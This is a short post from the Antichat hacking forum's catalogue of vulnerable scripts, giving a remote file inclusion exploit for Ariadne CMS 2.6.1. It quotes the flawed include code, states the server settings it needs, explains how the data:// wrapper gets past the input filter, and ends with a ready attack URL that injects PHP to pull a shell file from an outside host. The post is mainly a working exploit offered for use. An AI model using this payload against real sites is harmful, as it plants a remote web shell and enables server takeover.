ANTICHAT - Показать сообщение отдельно - Энциклопедия уязвимых скриптов

Product: Ariadne CMS
Author: http://www.ariadne-cms.org/
Version: 2.6.1
RFI

Need: register_globals = ON and allow_url_include = ON

file: /winges/tree/root.php

PHP код:


		
			
  if (!isset($layout) || (!$layout)) {

    $layout="./frames.js";

  } else {

    $layout=ereg_replace("[\./\\]","",$layout).".js";

  }

  include($layout);

По сути есть фильтр,но Ctacok научил юзать data://, поэтому обход прост.
target: ?layout=data:,<?php include $_GET[hello] ?>&hello=http://yousite.com/shell.txt?